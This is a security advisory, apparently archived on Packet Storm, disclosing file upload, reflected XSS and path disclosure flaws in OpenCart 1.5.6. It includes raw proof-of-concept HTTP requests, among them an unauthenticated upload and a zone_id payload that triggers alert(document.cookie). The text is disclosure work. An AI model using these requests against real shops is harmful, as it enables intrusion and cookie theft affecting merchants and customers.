what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

OpenCart 1.5.6 File Upload / XSS / Path Disclosure

OpenCart 1.5.6 File Upload / XSS / Path Disclosure
Posted Dec 5, 2013
Authored by trueend5

OpenCart version 1.5.6 suffers from cross site scripting, path disclosure, and remote file upload vulnerabilities.

tags | exploit, remote, vulnerability, xss, info disclosure, file upload
SHA-256 | 371e1add9d841cd724ecebaaf12aa30d8f618c80bf66d43adecbdfa1460b8157

OpenCart 1.5.6 File Upload / XSS / Path Disclosure

Change Mirror Download
--479758653-844428858-1386184016=:70324
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

###########################################################################=
=0A# Title: Opencart Multiple Vulnerabilities=0A# Vendor: http://www.openca=
rt.com=0A# Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure=0A#=
Vulnerable Version: opencart 1.5.6 (prior versions also may be affected)=
=0A# Exploitation: Remote with browser=0A# Impact: High=0A# Vendor Supplied=
Patch: N/A=0A# Original Advisory with Workaround: =0A# http://www.garda.ir=
/Opencart_Multiple_Vulnerabilities.html=0A#################################=
##########################################=0A=0A####################=0A- De=
scription:=0A####################=0A=0AQuote from vendor: OpenCart is a tur=
n-key ready "out of the box" shopping cart solution.=0AYou simply install, =
select your template, add products and you're ready to start accepting orde=
rs.=0A=0A=0A####################=0A- Vulnerability:=0A####################=
=0AIn the process of optimizing our crawler engine by garda.ir (garda.ir is=
a Persian online shopping price comparison service which uses new search e=
ngine technologies to grab prices) we found file upload vulnerability in op=
encart application, further investigation lead us to discover other vulnera=
bilities such as path disclosure and xss.=0A=C2=A0=0A=0A=0A################=
####=0A- POC:=0A####################=0A=0A# 1=0A# File Upload=0A# Insuffici=
ent Authorization in /catalog/controller/product/product.php =0A# Result: t=
estupload.txt.somehash is created in /download folder=0A=0A=0APOST /opencar=
t-1.5.6/index.php?route=3Dproduct/product/upload HTTP/1.1=0AHost: example.c=
om=0AContent-Type: multipart/form-data; boundary=3D------------------------=
---4827543632391=0AContent-Length: 206=0AConnection: Keep-Alive=0A=0A=0A---=
--------------------------4827543632391=0AContent-Disposition: form-data; n=
ame=3D"file"; filename=3D"testupload.txt"=0AContent-Type: text/plain=0A=0At=
esttesttest=0A-----------------------------4827543632391--=0A=0A=0A# 2=0A# =
Reflected XSS and Path Disclosure=0A# Input Validation Error in /catalog/co=
ntroller/account/register.php=0A# Result: this will cause arbitrary scripti=
ng code to be executed by the=C2=A0=C2=A0=C2=A0=C2=A0=C2=A0=C2=A0 # target =
user's browser.=0A=0APOST /opencart-1.5.6/index.php?route=3Daccount/registe=
r HTTP/1.1=0AContent-Type: multipart/form-data; boundary=3D----------------=
-----------1e7a98bc645efbe7=0AContent-Length: 181=0AHost: example.com=0ACon=
nection: Keep-Alive=0A=0A=0A-----------------------------1e7a98bc645efbe7=
=0AContent-Disposition: form-data; name=3D"zone_id"=0A=0A12345'+alert(docum=
ent.cookie)+'=0A-----------------------------1e7a98bc645efbe7--=0A=0A=0A# 3=
=0A# Information Leakage =E2=80=93 Path Disclosure=0A# Insufficient Authori=
zation in /system/logs/error.txt =0A# Result: Information Disclosure=0A=0Ah=
ttp://www.example.com/opencart-1.5.6/system/logs/error.txt=0A=0A=0A########=
############=0A- Solution:=0A####################=0AThere is no Vendor Supp=
lied Patch at the time of this entry.=0AFor workaround check the Original A=
dvisory.=0A=0A=0A####################=0A- Credit:=0A####################=0A=
Discovered by: trueend5 (trueend5 [at] yahoo com)=0A=0AThis advisory is spo=
nsored by garda.ir=0Ahttp://www.garda.ir=0AA Persian online shopping price =
comparison service=0A
--479758653-844428858-1386184016=:70324
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

<html><body><div style=3D"color:#000; background-color:#fff; font-family:He=
lveticaNeue, Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif;fo=
nt-size:12pt"><div>########################################################=
###################<br># Title: Opencart Multiple Vulnerabilities<br># Vend=
or: http://www.opencart.com<br># Vulnerabilities: Arbitrary File Upload, XS=
S, Path Disclosure<br># Vulnerable Version: opencart 1.5.6 (prior versions =
also may be affected)<br># Exploitation: Remote with browser<br># Impact: H=
igh<br># Vendor Supplied Patch: N/A<br># Original Advisory with Workaround:=
<br># http://www.garda.ir/Opencart_Multiple_Vulnerabilities.html<br>######=
#####################################################################<br><b=
r>####################<br>- Description:<br>####################<br><br>Quo=
te from vendor: OpenCart is a turn-key ready "out of the box" shopping cart=
solution.<br>You simply install, select your template, add products
and you're ready to start accepting orders.<br><br><br>###################=
#<br>- Vulnerability:<br>####################<br>In the process of optimizi=
ng our crawler engine by garda.ir (garda.ir is a Persian online shopping pr=
ice comparison service which uses new search engine technologies to grab pr=
ices) we found file upload vulnerability in opencart application, further i=
nvestigation lead us to discover other vulnerabilities such as path disclos=
ure and xss.<br>&nbsp;<br><br><br>####################<br>- POC:<br>#######=
#############<br><br># 1<br># File Upload<br># Insufficient Authorization i=
n /catalog/controller/product/product.php <br># Result: testupload.txt.some=
hash is created in /download folder<br><br><br>POST /opencart-1.5.6/index.p=
hp?route=3Dproduct/product/upload HTTP/1.1<br>Host: example.com<br>Content-=
Type: multipart/form-data; boundary=3D---------------------------4827543632=
391<br>Content-Length: 206<br>Connection:
Keep-Alive<br><br><br>-----------------------------4827543632391<br>Conten=
t-Disposition: form-data; name=3D"file"; filename=3D"testupload.txt"<br>Con=
tent-Type: text/plain<br><br>testtesttest<br>-----------------------------4=
827543632391--<br><br><br># 2<br># Reflected XSS and Path Disclosure<br># I=
nput Validation Error in /catalog/controller/account/register.php<br># Resu=
lt: this will cause arbitrary scripting code to be executed by the&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp; # target user's browser.<br><br>POST /opencart-=
1.5.6/index.php?route=3Daccount/register HTTP/1.1<br>Content-Type: multipar=
t/form-data; boundary=3D---------------------------1e7a98bc645efbe7<br>Cont=
ent-Length: 181<br>Host: example.com<br>Connection: Keep-Alive<br><br><br>-=
----------------------------1e7a98bc645efbe7<br>Content-Disposition: form-d=
ata; name=3D"zone_id"<br><br>12345'+alert(document.cookie)+'<br>-----------=
------------------1e7a98bc645efbe7--<br><br><br># 3<br># Information Leakag=
e
=E2=80=93 Path Disclosure<br># Insufficient Authorization in /system/logs/=
error.txt <br># Result: Information Disclosure<br><br>http://www.example.co=
m/opencart-1.5.6/system/logs/error.txt<br><br><br>####################<br>-=
Solution:<br>####################<br>There is no Vendor Supplied Patch at =
the time of this entry.<br>For workaround check the Original Advisory.<br><=
br><br>####################<br>- Credit:<br>####################<br>Discove=
red by: trueend5 (trueend5 [at] yahoo com)<br><br>This advisory is sponsore=
d by garda.ir<br>http://www.garda.ir<br>A Persian online shopping price com=
parison service</div></div></body></html>
--479758653-844428858-1386184016=:70324--
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close